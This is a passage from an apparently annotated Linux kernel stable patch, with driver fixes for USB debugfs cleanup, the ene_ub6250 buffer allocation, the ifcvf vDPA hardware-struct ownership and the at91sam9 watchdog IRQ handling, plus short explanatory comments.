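			"control/terminal/output/default/bSourceID";
		int fd = open(attr, O_WRONLY);

		if (fd < 0) {
			perror("open");
			return 1;
		}
		/* kstrtou8(page, 0, ...) accepts decimal, 0x-hex or octal. */
		if (write(fd, "2\n", 2) != 2)
			perror("write");
		close(fd);
		return 0;
	}
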
+diff --git a/drivers/usb/gadget/udc/bcm63xx_udc.c b/drivers/usb/gadget/udc/bcm63xx_udc.c
+index d04d72f5816e6..8d58928913007 100644
+--- a/drivers/usb/gadget/udc/bcm63xx_udc.c
++++ b/drivers/usb/gadget/udc/bcm63xx_udc.c
+@@ -2258,7 +2258,7 @@ static void bcm63xx_udc_init_debugfs(struct bcm63xx_udc *udc)
+  */
+ static void bcm63xx_udc_cleanup_debugfs(struct bcm63xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ /***********************************************************************
+diff --git a/drivers/usb/gadget/udc/gr_udc.c b/drivers/usb/gadget/udc/gr_udc.c
+index 85cdc0af3bf95..09762559912d3 100644
+--- a/drivers/usb/gadget/udc/gr_udc.c
++++ b/drivers/usb/gadget/udc/gr_udc.c
+@@ -215,7 +215,7 @@ static void gr_dfs_create(struct gr_udc *dev)
+ 
+ static void gr_dfs_delete(struct gr_udc *dev)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dev->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dev->dev), usb_debug_root);
+ }
+ 
+ #else /* !CONFIG_USB_GADGET_DEBUG_FS */
+diff --git a/drivers/usb/gadget/udc/lpc32xx_udc.c b/drivers/usb/gadget/udc/lpc32xx_udc.c
+index cea10cdb83ae5..fe62db32dd0eb 100644
+--- a/drivers/usb/gadget/udc/lpc32xx_udc.c
++++ b/drivers/usb/gadget/udc/lpc32xx_udc.c
+@@ -532,7 +532,7 @@ static void create_debug_file(struct lpc32xx_udc *udc)
+ 
+ static void remove_debug_file(struct lpc32xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(debug_filename, NULL));
++	debugfs_lookup_and_remove(debug_filename, NULL);
+ }
+ 
+ #else
+diff --git a/drivers/usb/gadget/udc/pxa25x_udc.c b/drivers/usb/gadget/udc/pxa25x_udc.c
+index c593fc383481e..9e01ddf2b4170 100644
+--- a/drivers/usb/gadget/udc/pxa25x_udc.c
++++ b/drivers/usb/gadget/udc/pxa25x_udc.c
+@@ -1340,7 +1340,7 @@ DEFINE_SHOW_ATTRIBUTE(udc_debug);
+ 		debugfs_create_file(dev->gadget.name, \
+ 			S_IRUGO, NULL, dev, &udc_debug_fops); \
+ 	} while (0)
+-#define remove_debug_files(dev) debugfs_remove(debugfs_lookup(dev->gadget.name, NULL))
++#define remove_debug_files(dev) debugfs_lookup_and_remove(dev->gadget.name, NULL)
+ 
+ #else	/* !CONFIG_USB_GADGET_DEBUG_FILES */
+ 
+diff --git a/drivers/usb/gadget/udc/pxa27x_udc.c b/drivers/usb/gadget/udc/pxa27x_udc.c
+index ac980d6a47406..0ecdfd2ba9e9b 100644
+--- a/drivers/usb/gadget/udc/pxa27x_udc.c
++++ b/drivers/usb/gadget/udc/pxa27x_udc.c
+@@ -215,7 +215,7 @@ static void pxa_init_debugfs(struct pxa_udc *udc)
+ 
+ static void pxa_cleanup_debugfs(struct pxa_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/isp116x-hcd.c b/drivers/usb/host/isp116x-hcd.c
+index 4f564d71bb0bc..49ae01487af4d 100644
+--- a/drivers/usb/host/isp116x-hcd.c
++++ b/drivers/usb/host/isp116x-hcd.c
+@@ -1205,7 +1205,7 @@ static void create_debug_file(struct isp116x *isp116x)
+ 
+ static void remove_debug_file(struct isp116x *isp116x)
+ {
+-	debugfs_remove(debugfs_lookup(hcd_name, usb_debug_root));
++	debugfs_lookup_and_remove(hcd_name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/isp1362-hcd.c b/drivers/usb/host/isp1362-hcd.c
+index 0e14d1d07709d..b0da143ef4be9 100644
+--- a/drivers/usb/host/isp1362-hcd.c
++++ b/drivers/usb/host/isp1362-hcd.c
+@@ -2170,7 +2170,7 @@ static void create_debug_file(struct isp1362_hcd *isp1362_hcd)
+ 
+ static void remove_debug_file(struct isp1362_hcd *isp1362_hcd)
+ {
+-	debugfs_remove(debugfs_lookup("isp1362", usb_debug_root));
++	debugfs_lookup_and_remove("isp1362", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/sl811-hcd.c b/drivers/usb/host/sl811-hcd.c
+index d206bd95c7bbc..b8b90eec91078 100644
+--- a/drivers/usb/host/sl811-hcd.c
++++ b/drivers/usb/host/sl811-hcd.c
+@@ -1501,7 +1501,7 @@ static void create_debug_file(struct sl811 *sl811)
+ 
+ static void remove_debug_file(struct sl811 *sl811)
+ {
+-	debugfs_remove(debugfs_lookup("sl811h", usb_debug_root));
++	debugfs_lookup_and_remove("sl811h", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/uhci-hcd.c b/drivers/usb/host/uhci-hcd.c
+index c22b51af83fcb..7cdc2fa7c28fb 100644
+--- a/drivers/usb/host/uhci-hcd.c
++++ b/drivers/usb/host/uhci-hcd.c
+@@ -536,8 +536,8 @@ static void release_uhci(struct uhci_hcd *uhci)
+ 	uhci->is_initialized = 0;
+ 	spin_unlock_irq(&uhci->lock);
+ 
+-	debugfs_remove(debugfs_lookup(uhci_to_hcd(uhci)->self.bus_name,
+-				      uhci_debugfs_root));
++	debugfs_lookup_and_remove(uhci_to_hcd(uhci)->self.bus_name,
++				  uhci_debugfs_root);
+ 
+ 	for (i = 0; i < UHCI_NUM_SKELQH; i++)
+ 		uhci_free_qh(uhci, uhci->skelqh[i]);
+@@ -700,7 +700,7 @@ err_alloc_frame_cpu:
+ 			uhci->frame, uhci->frame_dma_handle);
+ 
+ err_alloc_frame:
+-	debugfs_remove(debugfs_lookup(hcd->self.bus_name, uhci_debugfs_root));
++	debugfs_lookup_and_remove(hcd->self.bus_name, uhci_debugfs_root);
+ 
+ 	return retval;
+ }
+diff --git a/drivers/usb/host/xhci-mvebu.c b/drivers/usb/host/xhci-mvebu.c
+index 60651a50770f9..87f1597a0e5ab 100644
+--- a/drivers/usb/host/xhci-mvebu.c
++++ b/drivers/usb/host/xhci-mvebu.c
+@@ -32,7 +32,7 @@ static void xhci_mvebu_mbus_config(void __iomem *base,
+ 
+ 	/* Program each DRAM CS in a separate window */
+ 	for (win = 0; win < dram->num_cs; win++) {
+-		const struct mbus_dram_window *cs = dram->cs + win;
++		const struct mbus_dram_window *cs = &dram->cs[win];
+ 
+ 		writel(((cs->size - 1) & 0xffff0000) | (cs->mbus_attr << 8) |
+ 		       (dram->mbus_dram_target_id << 4) | 1,
+diff --git a/drivers/usb/storage/ene_ub6250.c b/drivers/usb/storage/ene_ub6250.c
+index 6012603f3630e..97c66c0d91f4d 100644
+--- a/drivers/usb/storage/ene_ub6250.c
++++ b/drivers/usb/storage/ene_ub6250.c
+@@ -939,7 +939,7 @@ static int ms_lib_process_bootblock(struct us_data *us, u16 PhyBlock, u8 *PageDa
+ 	struct ms_lib_type_extdat ExtraData;
+ 	struct ene_ub6250_info *info = (struct ene_ub6250_info *) us->extra;
+ 
+-	PageBuffer = kmalloc(MS_BYTES_PER_PAGE, GFP_KERNEL);
++	PageBuffer = kzalloc(MS_BYTES_PER_PAGE * 2, GFP_KERNEL);
+ 	if (PageBuffer == NULL)
+ 		return (u32)-1;
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.c b/drivers/vdpa/ifcvf/ifcvf_base.c
+index 3e4486bfa0b71..3ec5ca3aefe1d 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.c
++++ b/drivers/vdpa/ifcvf/ifcvf_base.c
+@@ -10,11 +10,6 @@
+ 
+ #include "ifcvf_base.h"
+ 
+-struct ifcvf_adapter *vf_to_adapter(struct ifcvf_hw *hw)
+-{
+-	return container_of(hw, struct ifcvf_adapter, vf);
+-}
+-
+ u16 ifcvf_set_vq_vector(struct ifcvf_hw *hw, u16 qid, int vector)
+ {
+ 	struct virtio_pci_common_cfg __iomem *cfg = hw->common_cfg;
+@@ -37,8 +32,6 @@ u16 ifcvf_set_config_vector(struct ifcvf_hw *hw, int vector)
+ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 				  struct virtio_pci_cap *cap)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-	struct pci_dev *pdev;
+ 	u32 length, offset;
+ 	u8 bar;
+ 
+@@ -46,17 +39,14 @@ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 	offset = le32_to_cpu(cap->offset);
+ 	bar = cap->bar;
+ 
+-	ifcvf= vf_to_adapter(hw);
+-	pdev = ifcvf->pdev;
+-
+ 	if (bar >= IFCVF_PCI_MAX_RESOURCE) {
+-		IFCVF_DBG(pdev,
++		IFCVF_DBG(hw->pdev,
+ 			  "Invalid bar number %u to get capabilities\n", bar);
+ 		return NULL;
+ 	}
+ 
+-	if (offset + length > pci_resource_len(pdev, bar)) {
+-		IFCVF_DBG(pdev,
++	if (offset + length > pci_resource_len(hw->pdev, bar)) {
++		IFCVF_DBG(hw->pdev,
+ 			  "offset(%u) + len(%u) overflows bar%u's capability\n",
+ 			  offset, length, bar);
+ 		return NULL;
+@@ -92,6 +82,7 @@ int ifcvf_init_hw(struct ifcvf_hw *hw, struct pci_dev *pdev)
+ 		IFCVF_ERR(pdev, "Failed to read PCI capability list\n");
+ 		return -EIO;
+ 	}
++	hw->pdev = pdev;
+ 
+ 	while (pos) {
+ 		ret = ifcvf_read_config_range(pdev, (u32 *)&cap,
+@@ -220,10 +211,8 @@ u64 ifcvf_get_features(struct ifcvf_hw *hw)
+ 
+ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ {
+-	struct ifcvf_adapter *ifcvf = vf_to_adapter(hw);
+-
+ 	if (!(features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)) && features) {
+-		IFCVF_ERR(ifcvf->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
++		IFCVF_ERR(hw->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -232,13 +221,11 @@ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ 
+ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *adapter;
+ 	u32 net_config_size = sizeof(struct virtio_net_config);
+ 	u32 blk_config_size = sizeof(struct virtio_blk_config);
+ 	u32 cap_size = hw->cap_dev_config_size;
+ 	u32 config_size;
+ 
+-	adapter = vf_to_adapter(hw);
+ 	/* If the onboard device config space size is greater than
+ 	 * the size of struct virtio_net/blk_config, only the spec
+ 	 * implementing contents size is returned, this is very
+@@ -253,7 +240,7 @@ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ 		break;
+ 	default:
+ 		config_size = 0;
+-		IFCVF_ERR(adapter->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
++		IFCVF_ERR(hw->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
+ 	}
+ 
+ 	return config_size;
+@@ -301,14 +288,11 @@ static void ifcvf_set_features(struct ifcvf_hw *hw, u64 features)
+ 
+ static int ifcvf_config_features(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-
+-	ifcvf = vf_to_adapter(hw);
+ 	ifcvf_set_features(hw, hw->req_features);
+ 	ifcvf_add_status(hw, VIRTIO_CONFIG_S_FEATURES_OK);
+ 
+ 	if (!(ifcvf_get_status(hw) & VIRTIO_CONFIG_S_FEATURES_OK)) {
+-		IFCVF_ERR(ifcvf->pdev, "Failed to set FEATURES_OK status\n");
++		IFCVF_ERR(hw->pdev, "Failed to set FEATURES_OK status\n");
+ 		return -EIO;
+ 	}
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.h b/drivers/vdpa/ifcvf/ifcvf_base.h
+index f5563f665cc62..25bd4e927b274 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.h
++++ b/drivers/vdpa/ifcvf/ifcvf_base.h
+@@ -39,7 +39,7 @@
+ #define IFCVF_INFO(pdev, fmt, ...)	dev_info(&pdev->dev, fmt, ##__VA_ARGS__)
+ 
+ #define ifcvf_private_to_vf(adapter) \
+-	(&((struct ifcvf_adapter *)adapter)->vf)
++	(((struct ifcvf_adapter *)adapter)->vf)
+ 
+ /* all vqs and config interrupt has its own vector */
+ #define MSIX_VECTOR_PER_VQ_AND_CONFIG		1
+@@ -89,12 +89,13 @@ struct ifcvf_hw {
+ 	u16 nr_vring;
+ 	/* VIRTIO_PCI_CAP_DEVICE_CFG size */
+ 	u32 cap_dev_config_size;
++	struct pci_dev *pdev;
+ };
+ 
+ struct ifcvf_adapter {
+ 	struct vdpa_device vdpa;
+ 	struct pci_dev *pdev;
+-	struct ifcvf_hw vf;
++	struct ifcvf_hw *vf;
+ };
+ 
+ struct ifcvf_vring_lm_cfg {
+@@ -109,6 +110,7 @@ struct ifcvf_lm_cfg {
+ 
+ struct ifcvf_vdpa_mgmt_dev {
+ 	struct vdpa_mgmt_dev mdev;
++	struct ifcvf_hw vf;
+ 	struct ifcvf_adapter *adapter;
+ 	struct pci_dev *pdev;
+ };
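
The header change is the heart of the ifcvf rework: struct ifcvf_hw moves out of the short-lived adapter into the management device, gains its own pdev back-pointer, and the adapter keeps only a pointer to it. That is what lets ifcvf_base.c drop vf_to_adapter(), since container_of() only works while the hw struct is physically embedded in the adapter. A reduced sketch of the two layouts, with made-up demo_* type names:

	#include <linux/container_of.h>

	struct demo_hw {
		struct pci_dev *pdev;	/* new: hw carries its own back-pointer */
	};

	/* Old layout: hw embedded, the adapter recovered via container_of(). */
	struct demo_adapter_old {
		struct pci_dev *pdev;
		struct demo_hw hw;
	};

	static inline struct demo_adapter_old *hw_to_adapter(struct demo_hw *hw)
	{
		return container_of(hw, struct demo_adapter_old, hw);
	}

	/* New layout: hw owned by the long-lived management device; the
	 * adapter, created and destroyed per vDPA device, only borrows it,
	 * so no container_of() round-trip is possible or needed. */
	struct demo_mgmt_dev {
		struct demo_hw hw;
	};

	struct demo_adapter_new {
		struct demo_hw *hw;	/* borrowed from demo_mgmt_dev */
	};

With hw->pdev available, every former vf_to_adapter(hw)->pdev dance in the main-file hunks below collapses to hw->pdev.
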
+diff --git a/drivers/vdpa/ifcvf/ifcvf_main.c b/drivers/vdpa/ifcvf/ifcvf_main.c
+index 44b29289aa193..d5036f49f161a 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_main.c
++++ b/drivers/vdpa/ifcvf/ifcvf_main.c
+@@ -69,10 +69,9 @@ static void ifcvf_free_irq_vectors(void *data)
+ 	pci_free_irq_vectors(data);
+ }
+ 
+-static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i;
+ 
+ 	for (i = 0; i < vf->nr_vring; i++) {
+@@ -83,10 +82,9 @@ static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->vqs_reused_irq != -EINVAL) {
+ 		devm_free_irq(&pdev->dev, vf->vqs_reused_irq, vf);
+@@ -95,20 +93,17 @@ static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ }
+ 
+-static void ifcvf_free_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+-
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ifcvf_free_per_vq_irq(adapter);
++		ifcvf_free_per_vq_irq(vf);
+ 	else
+-		ifcvf_free_vqs_reused_irq(adapter);
++		ifcvf_free_vqs_reused_irq(vf);
+ }
+ 
+-static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->config_irq == -EINVAL)
+ 		return;
+@@ -123,12 +118,12 @@ static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
++	struct pci_dev *pdev = vf->pdev;
+ 
+-	ifcvf_free_vq_irq(adapter);
+-	ifcvf_free_config_irq(adapter);
++	ifcvf_free_vq_irq(vf);
++	ifcvf_free_config_irq(vf);
+ 	ifcvf_free_irq_vectors(pdev);
+ }
+ 
+@@ -137,10 +132,9 @@ static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
+  * It returns the number of allocated vectors, or a negative
+  * value on failure.
+  */
+-static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
++static int ifcvf_alloc_vectors(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int max_intr, ret;
+ 
+ 	/* all queues and config interrupt  */
+@@ -160,10 +154,9 @@ static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vf->vqs_reused_irq = -EINVAL;
+@@ -190,15 +183,14 @@ static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -224,15 +216,14 @@ static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_dev_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -265,29 +256,27 @@ static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ 
+ }
+ 
+-static int ifcvf_request_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ret = ifcvf_request_per_vq_irq(adapter);
++		ret = ifcvf_request_per_vq_irq(vf);
+ 	else
+-		ret = ifcvf_request_vqs_reused_irq(adapter);
++		ret = ifcvf_request_vqs_reused_irq(vf);
+ 
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int config_vector, ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+@@ -320,17 +309,16 @@ static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int nvectors, ret, max_intr;
+ 
+-	nvectors = ifcvf_alloc_vectors(adapter);
++	nvectors = ifcvf_alloc_vectors(vf);
+ 	if (nvectors <= 0)
+ 		return -EFAULT;
+ 
+@@ -341,16 +329,16 @@ static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
+ 
+ 	if (nvectors == 1) {
+ 		vf->msix_vector_status = MSIX_VECTOR_DEV_SHARED;
+-		ret = ifcvf_request_dev_irq(adapter);
++		ret = ifcvf_request_dev_irq(vf);
+ 
+ 		return ret;
+ 	}
+ 
+-	ret = ifcvf_request_vq_irq(adapter);
++	ret = ifcvf_request_vq_irq(vf);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ifcvf_request_config_irq(adapter);
++	ret = ifcvf_request_config_irq(vf);
+ 
+ 	if (ret)
+ 		return ret;
+@@ -414,7 +402,7 @@ static struct ifcvf_hw *vdpa_to_vf(struct vdpa_device *vdpa_dev)
+ {
+ 	struct ifcvf_adapter *adapter = vdpa_to_adapter(vdpa_dev);
+ 
+-	return &adapter->vf;
++	return adapter->vf;
+ }
+ 
+ static u64 ifcvf_vdpa_get_device_features(struct vdpa_device *vdpa_dev)
+@@ -479,7 +467,7 @@ static void ifcvf_vdpa_set_status(struct vdpa_device *vdpa_dev, u8 status)
+ 
+ 	if ((status & VIRTIO_CONFIG_S_DRIVER_OK) &&
+ 	    !(status_old & VIRTIO_CONFIG_S_DRIVER_OK)) {
+-		ret = ifcvf_request_irq(adapter);
++		ret = ifcvf_request_irq(vf);
+ 		if (ret) {
+ 			status = ifcvf_get_status(vf);
+ 			status |= VIRTIO_CONFIG_S_FAILED;
+@@ -511,7 +499,7 @@ static int ifcvf_vdpa_reset(struct vdpa_device *vdpa_dev)
+ 
+ 	if (status_old & VIRTIO_CONFIG_S_DRIVER_OK) {
+ 		ifcvf_stop_datapath(adapter);
+-		ifcvf_free_irq(adapter);
++		ifcvf_free_irq(vf);
+ 	}
+ 
+ 	ifcvf_reset_vring(adapter);
+@@ -758,12 +746,20 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	int ret;
+ 
+ 	ifcvf_mgmt_dev = container_of(mdev, struct ifcvf_vdpa_mgmt_dev, mdev);
+-	if (!ifcvf_mgmt_dev->adapter)
+-		return -EOPNOTSUPP;
++	vf = &ifcvf_mgmt_dev->vf;
++	pdev = vf->pdev;
++	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
++				    &pdev->dev, &ifc_vdpa_ops, 1, 1, NULL, false);
++	if (IS_ERR(adapter)) {
++		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
++		return PTR_ERR(adapter);
++	}
+ 
+-	adapter = ifcvf_mgmt_dev->adapter;
+-	vf = &adapter->vf;
+-	pdev = adapter->pdev;
++	ifcvf_mgmt_dev->adapter = adapter;
++	adapter->pdev = pdev;
++	adapter->vdpa.dma_dev = &pdev->dev;
++	adapter->vdpa.mdev = mdev;
++	adapter->vf = vf;
+ 	vdpa_dev = &adapter->vdpa;
+ 
+ 	if (name)
+@@ -781,7 +777,6 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	return 0;
+ }
+ 
+-
+ static void ifcvf_vdpa_dev_del(struct vdpa_mgmt_dev *mdev, struct vdpa_device *dev)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+@@ -800,7 +795,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+ 	struct device *dev = &pdev->dev;
+-	struct ifcvf_adapter *adapter;
+ 	struct ifcvf_hw *vf;
+ 	u32 dev_type;
+ 	int ret, i;
+@@ -831,20 +825,16 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	}
+ 
+ 	pci_set_master(pdev);
+-
+-	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
+-				    dev, &ifc_vdpa_ops, 1, 1, NULL, false);
+-	if (IS_ERR(adapter)) {
+-		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
+-		return PTR_ERR(adapter);
++	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
++	if (!ifcvf_mgmt_dev) {
++		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
++		return -ENOMEM;
+ 	}
+ 
+-	vf = &adapter->vf;
++	vf = &ifcvf_mgmt_dev->vf;
+ 	vf->dev_type = get_dev_type(pdev);
+ 	vf->base = pcim_iomap_table(pdev);
+-
+-	adapter->pdev = pdev;
+-	adapter->vdpa.dma_dev = &pdev->dev;
++	vf->pdev = pdev;
+ 
+ 	ret = ifcvf_init_hw(vf, pdev);
+ 	if (ret) {
+@@ -858,16 +848,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	vf->hw_features = ifcvf_get_hw_features(vf);
+ 	vf->config_size = ifcvf_get_config_size(vf);
+ 
+-	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
+-	if (!ifcvf_mgmt_dev) {
+-		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
+-		return -ENOMEM;
+-	}
+-
+-	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
+-	ifcvf_mgmt_dev->mdev.device = dev;
+-	ifcvf_mgmt_dev->adapter = adapter;
+-
+ 	dev_type = get_dev_type(pdev);
+ 	switch (dev_type) {
+ 	case VIRTIO_ID_NET:
+@@ -882,12 +862,11 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		goto err;
+ 	}
+ 
++	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
++	ifcvf_mgmt_dev->mdev.device = dev;
+ 	ifcvf_mgmt_dev->mdev.max_supported_vqs = vf->nr_vring;
+ 	ifcvf_mgmt_dev->mdev.supported_features = vf->hw_features;
+ 
+-	adapter->vdpa.mdev = &ifcvf_mgmt_dev->mdev;
+-
+-
+ 	ret = vdpa_mgmtdev_register(&ifcvf_mgmt_dev->mdev);
+ 	if (ret) {
+ 		IFCVF_ERR(pdev,
+diff --git a/drivers/watchdog/at91sam9_wdt.c b/drivers/watchdog/at91sam9_wdt.c
+index 292b5a1ca8318..fed7be2464420 100644
+--- a/drivers/watchdog/at91sam9_wdt.c
++++ b/drivers/watchdog/at91sam9_wdt.c
+@@ -206,10 +206,9 @@ static int at91_wdt_init(struct platform_device *pdev, struct at91wdt *wdt)
+ 			 "min heartbeat and max heartbeat might be too close for the system to handle it correctly\n");
+ 
+ 	if ((tmp & AT91_WDT_WDFIEN) && wdt->irq) {
+-		err = request_irq(wdt->irq, wdt_interrupt,
+-				  IRQF_SHARED | IRQF_IRQPOLL |
+-				  IRQF_NO_SUSPEND,
+-				  pdev->name, wdt);
++		err = devm_request_irq(dev, wdt->irq, wdt_interrupt,
++				       IRQF_SHARED | IRQF_IRQPOLL | IRQF_NO_SUSPEND,
++				       pdev->name, wdt);
+ 		if (err)
+ 			return err;
+ 	}
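
Switching the watchdog IRQ to devm_request_irq() ties its lifetime to the struct device, so the driver's error and unbind paths need no matching free_irq(); the original request_irq() was never released on some error paths. A minimal probe sketch of the managed form (demo_* names are illustrative):

	#include <linux/interrupt.h>
	#include <linux/platform_device.h>

	static irqreturn_t demo_irq(int irq, void *data)
	{
		return IRQ_HANDLED;
	}

	static int demo_probe(struct platform_device *pdev)
	{
		int irq = platform_get_irq(pdev, 0);

		if (irq < 0)
			return irq;
		/*
		 * Managed registration: the IRQ is released automatically
		 * when the device unbinds, so no free_irq() anywhere.
		 */
		return devm_request_irq(&pdev->dev, irq, demo_irq,
					IRQF_SHARED, pdev->name, pdev);
	}
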
+diff --git a/drivers/watchdog/pcwd_usb.c b/drivers/watchdog/pcwd_usb.c
+index 1bdaf17c1d38d..8202f0a6b0935 100644
